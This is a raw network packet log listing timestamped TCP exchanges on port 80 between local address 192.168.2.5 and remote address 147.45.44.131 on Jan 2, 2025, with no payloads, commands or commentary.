                                                                        Jan 2, 2025 19:14:14.765770912 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.765770912 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.765772104 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.765811920 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.765845060 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.766766071 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766833067 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766844034 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766855001 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766875029 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766891956 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766902924 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766915083 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766921997 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.766921997 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.766927958 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.766941071 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767055988 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767426014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767438889 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767451048 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767462015 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767472982 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767508030 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767508030 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767577887 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767590046 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767601013 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767610073 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767611027 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767625093 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767642975 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767652988 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767658949 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767657995 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767658949 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767671108 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767677069 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767687082 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767697096 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767708063 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767735004 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767754078 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.767765999 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767812014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.767846107 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768424988 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768435955 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768446922 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768460035 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768471003 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768477917 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768488884 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768505096 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768524885 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768731117 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768743038 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768754005 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768764019 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768764973 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768781900 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768799067 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768811941 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768821955 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768832922 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768841982 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768853903 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768853903 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768862963 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768872023 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768874884 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768887997 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768899918 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768908978 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.768917084 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.768934965 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769001007 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769012928 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769020081 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769031048 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769052029 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769052029 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769123077 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769136906 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769149065 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769160032 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769171000 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769181013 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769198895 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769211054 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769224882 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769262075 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769262075 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769294024 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769305944 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769320965 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769339085 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769351006 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769359112 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769364119 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769376040 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769387007 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769423962 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769483089 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769483089 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769483089 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769501925 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769675970 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.769942999 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769954920 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769965887 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769984007 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.769994974 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770000935 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770011902 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770020008 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770034075 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770098925 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770109892 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770122051 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770133018 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770143032 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770148039 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770150900 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770164967 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770195961 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770214081 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770243883 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770255089 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770265102 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770267010 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770276070 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770308018 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770308018 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770334005 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770404100 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770414114 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770425081 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770436049 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770446062 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770457029 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770468950 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770476103 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770483971 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770548105 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770569086 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770586014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770602942 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770612955 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770623922 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770636082 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770639896 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770648003 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770658970 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770663023 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770670891 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.770704031 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.770724058 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.852688074 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852709055 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852722883 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852734089 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852746010 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852757931 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852765083 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.852768898 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852782965 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.852802992 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.852878094 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.853763103 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853774071 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853784084 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853825092 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853835106 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853847980 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.853847980 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.853852987 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853866100 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853877068 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853885889 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853909016 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.853950024 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853962898 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853985071 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.853995085 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854001999 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854006052 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854020119 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854029894 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854059935 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854082108 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854082108 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854123116 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854154110 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854166031 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854177952 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854196072 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854207039 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854217052 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854228020 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854247093 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854259014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854283094 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854283094 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854320049 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854362011 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854366064 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854383945 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854396105 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854404926 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854424000 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854427099 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854435921 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854446888 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854453087 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854454041 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.854491949 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.854541063 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855300903 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855377913 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855389118 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855406046 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855413914 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855415106 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855427027 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855438948 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855448961 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855458021 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855458975 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855458021 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855477095 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855489016 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855494022 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855500937 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855510950 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855529070 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855532885 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855540991 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855550051 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855552912 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855592012 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855602980 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855612993 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855622053 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855640888 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855659008 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855664015 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855669975 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855676889 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855706930 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855715990 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855731010 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855741024 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855750084 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855762959 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855772972 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855775118 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855791092 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855834007 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855835915 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855884075 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855920076 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855922937 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.855952978 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855964899 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.855971098 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856025934 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856036901 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856043100 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856048107 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856054068 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856132030 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856167078 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856179953 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856190920 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856193066 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856205940 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856213093 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856219053 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856225014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856235027 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856240034 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856326103 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856331110 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856343985 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856362104 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856519938 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856751919 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856764078 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856781006 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856791019 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856801987 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856815100 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856825113 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856825113 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856825113 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856838942 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856852055 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856853962 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856873989 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856888056 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856889963 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856899977 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856914043 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856947899 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.856969118 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856981039 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.856992960 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857002974 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857014894 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857026100 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857055902 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.857055902 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.857196093 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857207060 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857213020 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857220888 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857225895 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857232094 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857237101 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857243061 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857253075 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857259035 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857264996 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857346058 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.857346058 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:14.857481003 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857492924 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857503891 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857513905 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857525110 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857536077 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:14.857562065 CET4972180192.168.2.5147.45.44.131
